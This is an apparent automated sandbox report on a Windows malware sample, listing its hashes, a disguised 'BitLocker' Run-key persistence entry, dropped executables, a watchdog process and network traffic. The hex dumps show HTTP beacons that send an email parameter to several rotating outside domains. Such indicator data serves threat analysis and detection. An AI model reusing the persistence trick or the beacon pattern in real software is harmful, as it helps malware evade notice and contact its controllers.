Analysis Date2014-09-19 05:03:11

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 7ce1d22833c534414c47f628f3acb3c3 sha1: f9cd8d98875f2b3a498dc3c5a7acccc6539d12cc size: 298496
Section.rdata md5: ef1b136dfed5910502b49af46d9a244a sha1: b7e44959572300172b11c871280845c79732eba2 size: 34816 md5: c0da35e1a6559ecec0cc9b3a91811418 sha1: eb25fb1d572bdacebdc3880467c8d0693bf96fee size: 95744
Timestamp2014-07-24 05:34:13
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\BitLocker File Machine Play Event Color Protocol ➝
C:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.exe

↳ C:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.rp
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bsusjauh.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\zmsczyirodgqu\bqtkuvrfqm.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝
Flows TCP192.168.1.1:1040 ➝
Flows TCP192.168.1.1:1041 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   7468696e 6b626579 6f6e642e 6e65740d
0x00000070 (00112)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   70726573 656e7462 65696e67 2e6e6574
0x00000070 (00112)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   63686965 66626569 6e672e6e 65740d0a
0x00000070 (00112)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   7477656c 7665666f 72657665 722e6e65
0x00000070 (00112)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   68697374 6f727966 6f726576 65722e6e   historyforever.n
0x00000070 (00112)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   77656174 68657266 6f726576 65722e6e   weatherforever.n
0x00000070 (00112)   65740d0a 0d0a                         et....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   636c6173 73626579 6f6e642e 6e65740d
0x00000070 (00112)   0a0d0a0a 0d0a                         ......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   7468696e 6b666c6f 7765722e 6e65740d
0x00000070 (00112)   0a0d0a0a 0d0a                         ......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   70726573 656e7466 6c6f7765 722e6e65
0x00000070 (00112)   740d0a0d 0a0a                         t.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   636f6c6c 65676563 6f726e65 722e6e65
0x00000070 (00112)   740d0a0d 0a0a                         t.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d706572 6c6a6240 616f6c2e   mail=perljb@aol.
0x00000020 (00032)   636f6d26 6d657468 6f643d70 6f737420   com&method=post 
0x00000030 (00048)   48545450 2f312e30 0d0a4163 63657074   HTTP/1.0..Accept
0x00000040 (00064)   3a202a2f 2a0d0a43 6f6e6e65 6374696f   : */*..Connectio
0x00000050 (00080)   6e3a2063 6c6f7365 0d0a486f 73743a20   n: close..Host: 
0x00000060 (00096)   6f667465 6e666c6f 7765722e 6e65740d
0x00000070 (00112)   0a0d0a0d 0a0a                         ......

An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
vbeala fdoidar ccbupnfook iceag ozfgioe mdf ngxohigr cclumysas ayeyjihu juku snnucei nbop glfec ndcudl imtn bfti lkl dqmiztm kjejubmq sgbenj hinlui oexv fhlo besbudbg dykob faidkuk dyvoyg rsrae rizvog jepqu bhjol bffizdg ouulnnuml entpelbis sdoxodrs zyyara allcu hjicagior zsdugpru arpdaqfjo zpvej ghbefmod mtjemecdi gijgimbm bslufusdol ysadumssa azncu ggtuj gdpamjv pjdu xviui lswajo ivvcocbq gigikooj pfpaerunbi dzb mpeje pbsua uobtzopcqa esmlu ndc ubb bsh quais jppeawgug roabvaf vft mfgavlbo opgr gvkex ahbzejdtus aqnfubfweb krlolkkab plye glic cflin pdlossbu lgj wbpeifpume bndu ccvauxwe manpokpwu wocn eicirn brvie lebsiwam lmjebmmuq yhy nbgooam fsl fii ctyev ofo gmzi nmbogocje qgcio tzzumgobem uhu cspojl mgjipggujr getbesbmoa bits iodsu cacc tjicufy erndirfge jxtu jgcidfcio azoitdedlp itqlu llcoffeceb sfkoicl famasovby gqimoedod cxmat jpocixloga fbbinlgiom pejs gdjatoiof tpobon braeagu bfbapcniu ldz unmc lzugulpbiy pbuzeddced mopg oakttihjag peopfu ojjl mugge bbyiufmne zszeayz zsmuim ifsp zmg rdigupv sckac kssoblc jjkoew fpc sskoa qffilksolq jliadajaoy ccuga zbmovtfep tpupombegu bbajieeb rczuguxtin loe snbiofso epullai vdfaiw mudtuefts sfuneizyeg wjnewzg vni yggisna pcuo jscec slho
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	N+D$
vo<W	7
